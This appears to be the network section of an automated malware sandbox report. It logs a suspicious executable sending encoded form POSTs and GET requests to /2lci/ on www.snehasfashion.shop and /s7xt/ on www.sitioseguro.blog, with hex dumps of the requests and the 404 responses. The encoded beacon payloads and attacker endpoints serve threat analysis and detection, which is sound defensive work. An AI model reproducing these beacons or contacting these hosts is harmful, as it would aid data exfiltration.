                                                                Data Raw: 2d 4a 6b 70 34 66 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 45 2b 58 70 64 7a 47 61 32 33 34 67 59 7a 5a 4c 66 67 44 4f 6f 4b 48 65 56 77 4c 6f 36 65 6c 63 50 66 77 53 42 70 66 53 70 66 55 73 54 59 72 72 56 4c 4e 69 64 33 76 2f 67 61 49 70 4d 56 48 42 2f 33 4b 6d 47 6c 6f 46 79 2b 44 58 38 2b 71 2b 74 35 35 56 58 73 38 4e 67 57 4e 56 73 5a 48 78 45 53 4c 35 72 4c 7a 53 63 75 41 66 2b 51 2b 4c 78 6a 6c 4e 2b 50 65 79 50 68 76 2f 70 47 6b 4b 68 71 79 33 77 65 49 4a 61 6e 37 33 57 73 43 6a 67 32 68 47 2b 51 47 53 46 38 52 4e 6c 59 6e 4b 58 58 6d 77 64 65 73 6f 63 71 68 34 33 38 4a 32 67 58 49 67 4c 6d 78 6d 47 31 75 6a 48 44 5a 77 68 47 44 46 41 3d 3d
                                                                Data Ascii: -Jkp4f=oUpW0YhmY+UamE+XpdzGa234gYzZLfgDOoKHeVwLo6elcPfwSBpfSpfUsTYrrVLNid3v/gaIpMVHB/3KmGloFy+DX8+q+t55VXs8NgWNVsZHxESL5rLzScuAf+Q+LxjlN+PeyPhv/pGkKhqy3weIJan73WsCjg2hG+QGSF8RNlYnKXXmwdesocqh438J2gXIgLmxmG1ujHDZwhGDFA==
                                                                Jan 11, 2025 05:11:10.843677044 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-powered-by: PHP/8.1.29
                                                                cache-control: no-cache, private
                                                                content-type: text/html; charset=UTF-8
                                                                content-length: 1992
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 04:11:10 GMT
                                                                Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                Jan 11, 2025 05:11:10.843704939 CET1005INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhFaWIK\>R4


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.74999088.198.8.15080360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:12.707468987 CET743OUTPOST /2lci/ HTTP/1.1
                                                                Host: www.snehasfashion.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.snehasfashion.shop
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.snehasfashion.shop/2lci/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 6b 4f 58 6c 61 48 47 53 32 33 33 75 34 7a 5a 51 76 67 48 4f 6f 57 48 65 55 46 4f 6f 4a 71 6c 46 75 76 77 54 46 64 66 52 70 66 55 30 6a 59 79 7a 31 4c 53 69 64 79 46 2f 69 4f 49 70 4d 42 48 42 39 76 4b 6d 56 39 72 45 69 2b 46 4f 73 2b 6f 36 74 35 35 56 58 73 38 4e 67 43 33 56 73 42 48 78 30 43 4c 6f 36 4c 79 4f 4d 75 44 4a 75 51 2b 42 52 69 4e 4e 2b 50 77 79 4f 74 46 2f 71 2b 6b 4b 69 2b 79 35 43 6d 4c 53 4b 6e 78 71 47 73 4a 74 54 54 75 44 66 34 49 58 6b 4d 33 49 6b 55 68 47 42 57 45 71 2f 53 41 32 4e 53 61 38 31 59 2f 68 47 4b 39 69 4b 69 70 72 6b 42 50 38 77 6d 7a 39 7a 6e 48 54 33 6c 4b 38 78 4a 48 6a 2b 7a 64 6c 63 50 56 79 50 45 51 2f 47 38 3d
                                                                Data Ascii: -Jkp4f=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoJqlFuvwTFdfRpfU0jYyz1LSidyF/iOIpMBHB9vKmV9rEi+FOs+o6t55VXs8NgC3VsBHx0CLo6LyOMuDJuQ+BRiNN+PwyOtF/q+kKi+y5CmLSKnxqGsJtTTuDf4IXkM3IkUhGBWEq/SA2NSa81Y/hGK9iKiprkBP8wmz9znHT3lK8xJHj+zdlcPVyPEQ/G8=
                                                                Jan 11, 2025 05:11:13.427510977 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-powered-by: PHP/8.1.29
                                                                cache-control: no-cache, private
                                                                content-type: text/html; charset=UTF-8
                                                                content-length: 1992
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 04:11:13 GMT
                                                                Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                Jan 11, 2025 05:11:13.427566051 CET224INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhF
                                                                Jan 11, 2025 05:11:13.427603006 CET781INData Raw: 61 d6 57 49 c0 4b 5c c6 b9 01 3e 99 8e e6 cd 52 8c 34 e3 f7 e5 cf db 70 51 90 4b fc 09 8b 8d 8f 22 02 3f ec 09 6b 6b 47 1d a0 d3 40 9f d8 39 0c 19 66 c3 dc 8c 09 28 37 b3 fe f6 b4 8b 43 5b 45 c6 d0 4c 9a f6 ed ec 24 73 66 74 7a dd 09 26 fb 79 bf
                                                                Data Ascii: aWIK\>R4pQK"?kkG@9f(7C[EL$sftz&yO/zE0qoo"fuh]2.O}Hxuf2*fT@[BmS P@L?elcYGc]4?b4~iiD`1 Liz


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.74999188.198.8.15080360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:15.309036970 CET1756OUTPOST /2lci/ HTTP/1.1
                                                                Host: www.snehasfashion.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.snehasfashion.shop
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.snehasfashion.shop/2lci/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 6b 4f 58 6c 61 48 47 53 32 33 33 75 34 7a 5a 51 76 67 48 4f 6f 57 48 65 55 46 4f 6f 49 53 6c 46 34 54 77 53 6b 64 66 51 70 66 55 71 54 59 33 7a 31 4c 66 69 64 4b 42 2f 69 43 79 70 4b 46 48 42 65 6e 4b 78 55 39 72 4b 69 2b 46 54 38 2b 70 2b 74 35 67 56 58 39 31 4e 67 53 33 56 73 42 48 78 79 2b 4c 34 62 4c 79 64 38 75 41 66 2b 51 49 4c 78 69 32 4e 2f 72 47 79 4f 70 2f 34 61 65 6b 4b 43 75 79 31 52 65 4c 50 61 6e 33 70 47 74 4a 74 54 75 75 44 66 6b 54 58 6b 49 4e 49 6d 45 68 45 6e 2f 35 37 38 7a 59 6e 4f 37 44 79 6a 34 64 6a 58 53 78 69 35 43 7a 31 48 6f 72 36 57 43 5a 2f 79 44 55 48 7a 77 6d 6f 47 55 78 71 50 58 74 71 35 62 52 71 64 55 57 2b 42 6b 51 49 30 73 7a 4c 78 2b 6c 69 4e 39 6f 4f 34 61 46 51 55 61 6f 50 77 32 6b 36 38 36 76 45 52 45 31 45 5a 64 73 71 43 56 59 77 49 55 53 58 34 4d 30 47 66 62 6f 55 49 54 56 58 43 5a 72 47 39 50 50 57 4f 4f 38 43 32 54 32 71 36 72 62 35 50 57 50 35 31 4d 46 46 2f 7a 52 64 62 4a 72 66 42 68 52 4d 31 67 [TRUNCATED]
                                                                Data Ascii: -Jkp4f=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoISlF4TwSkdfQpfUqTY3z1LfidKB/iCypKFHBenKxU9rKi+FT8+p+t5gVX91NgS3VsBHxy+L4bLyd8uAf+QILxi2N/rGyOp/4aekKCuy1ReLPan3pGtJtTuuDfkTXkINImEhEn/578zYnO7Dyj4djXSxi5Cz1Hor6WCZ/yDUHzwmoGUxqPXtq5bRqdUW+BkQI0szLx+liN9oO4aFQUaoPw2k686vERE1EZdsqCVYwIUSX4M0GfboUITVXCZrG9PPWOO8C2T2q6rb5PWP51MFF/zRdbJrfBhRM1gDcsfNy2AoH7sp80UAXmDFChySff0n2fw2zhJyZ7Rrwsdg4o+ydClwasZ8AtCKukHVdIzK0HbEagrS3GVjrBoNlL3hr5RNkqF+ve/tpKzQI6+S32O2v6BbNyaFf2ZULgfOBr1FdYqyC23jQo/jT02U8ICP9IpyUTJ+xpKgZsohsMBLIJt/Bxf3GEH/zVS2Ra8k2GHNIhCxbjePdN1/wGFv1kZ/XyqIrVNtmgWVsBecHAdZbOcAD1885j4SOIbJh2J7w8YTqCvkP+RLf8WNE3mul4UMtsIMO46BxYt5t7VCNquztFsEriDgDAxIh3TO0Gu9jVfQU09RIWPSqBpkuDHcg5lXnt9Ofxh28Tj0BhFCuuKRIUWvRoU16jbe6EaIIP2MR3u3FE8xPyMp3PK+V4fnf7nR/apFFuldb/nPn3tYIulfrrNbFXCAu1YRU1bgwYLf3NaSf4HahXZHpVKoqjrp3rijCJni0YIEx0tA0iACIORvEK4jIZU4IL0XiSbIqiaW8CxeyOLyIxBvFGn/Iq22JElRljpKjzGUBk70gKhf5nemphTUclt/konai5T4ZM0zRRWh6KGsoPHDHQNCn5xrhSzHw5rOGY1SWQER6wWv9T1JLqaCfCZT/Ms+xnWZ2BWhiXUFweEie1Yo1KrkVABm+dATPlEEX4oOg [TRUNCATED]
                                                                Jan 11, 2025 05:11:16.124332905 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-powered-by: PHP/8.1.29
                                                                cache-control: no-cache, private
                                                                content-type: text/html; charset=UTF-8
                                                                content-length: 1992
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 04:11:16 GMT
                                                                Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                Jan 11, 2025 05:11:16.124356031 CET1005INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhFaWIK\>R4


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.74999288.198.8.15080360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:17.843693972 CET455OUTGET /2lci/?SVjx=u6ApldVh4TiTWl&-Jkp4f=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDKFSbRcaZ2/tMcmtbbzmofvFf8wLCxrzsSN20Y6kXBwn9DafM4OtR1q/N HTTP/1.1
                                                                Host: www.snehasfashion.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:18.533229113 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-powered-by: PHP/8.1.29
                                                                cache-control: no-cache, private
                                                                content-type: text/html; charset=UTF-8
                                                                content-length: 6603
                                                                date: Sat, 11 Jan 2025 04:11:18 GMT
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> <style> /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace}svg,video{display:block;vertical-align:middle}video{max-width:100%;height:auto}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opa [TRUNCATED]
                                                                Jan 11, 2025 05:11:18.533282995 CET1236INData Raw: 2d 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 37 66 61 66 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 37 2c 32 35 30 2c 32 35 32 2c 76 61 72 28 2d 2d 62 67
                                                                Data Ascii: --bg-opacity:1;background-color:#f7fafc;background-color:rgba(247,250,252,var(--bg-opacity))}.border-gray-200{--border-opacity:1;border-color:#edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;bord
                                                                Jan 11, 2025 05:11:18.533299923 CET448INData Raw: 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 7d 2e 72 65 6c 61 74 69 76 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 74 6f 70 2d 30 7b 74 6f 70 3a 30 7d 2e 72 69 67 68 74 2d 30 7b 72 69 67 68 74 3a 30 7d 2e 73 68 61 64 6f 77 7b 62
                                                                Data Ascii: position:fixed}.relative{position:relative}.top-0{top:0}.right-0{right:0}.shadow{box-shadow:0 1px 3px 0 rgba(0,0,0,.1),0 1px 2px 0 rgba(0,0,0,.06)}.text-center{text-align:center}.text-gray-200{--text-opacity:1;color:#edf2f7;color:rgba(237,242,
                                                                Jan 11, 2025 05:11:18.533313990 CET1236INData Raw: 2e 74 65 78 74 2d 67 72 61 79 2d 35 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 61 30 61 65 63 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 36 30 2c 31 37 34 2c 31 39 32 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70
                                                                Data Ascii: .text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#718096;color:rgba(113,128,150,var(--text-opacity))}.text-gray-700{--text-opacity:1;color:#4a5568;color:rgba(74,85,
                                                                Jan 11, 2025 05:11:18.533329010 CET1236INData Raw: 62 69 63 2d 62 65 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e
                                                                Data Ascii: bic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@keyframes bounce{0%,to{transform:translateY(-25%);-webkit-animation-timing-function:cu
                                                                Jan 11, 2025 05:11:18.533341885 CET448INData Raw: 6b 5c 3a 62 67 2d 67 72 61 79 2d 39 30 30 7b 2d 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 32 30 32 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 36 2c 33 32
                                                                Data Ascii: k\:bg-gray-900{--bg-opacity:1;background-color:#1a202c;background-color:rgba(26,32,44,var(--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text
                                                                Jan 11, 2025 05:11:18.533360004 CET967INData Raw: 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 75 69 2d 73 61 6e 73 2d 73 65 72 69 66 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20
                                                                Data Ascii: body { font-family: ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color E


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.749993104.21.15.10080360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:23.590764046 CET717OUTPOST /s7xt/ HTTP/1.1
                                                                Host: www.sitioseguro.blog
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.sitioseguro.blog
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.sitioseguro.blog/s7xt/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 2b 70 39 7a 31 69 43 59 31 56 31 55 67 64 79 62 57 39 6d 61 4a 6d 65 78 63 52 74 35 41 32 62 75 35 62 76 44 54 6a 42 75 50 30 6f 35 6a 30 30 44 6c 6a 71 53 6d 57 4e 75 78 35 64 41 65 75 34 6e 57 50 4c 75 48 37 52 79 56 4a 4a 6b 4b 43 6c 35 72 4e 4c 79 53 74 78 6c 73 44 49 4c 69 44 58 2f 37 69 34 6f 6f 2b 62 31 59 52 38 7a 73 4f 6f 4a 57 6e 6d 35 58 47 56 71 6a 69 32 78 47 47 68 79 35 76 55 69 31 4a 58 39 75 36 74 66 41 54 33 72 55 34 56 4f 4d 50 47 45 61 73 30 52 47 36 4d 75 6f 45 2b 72 33 79 70 68 49 72 73 6f 76 39 4c 59 32 6a 50 63 59 67 74 50 4c 47 4e 73 73 45 54 6d 63 4c 49 6d 67 3d 3d
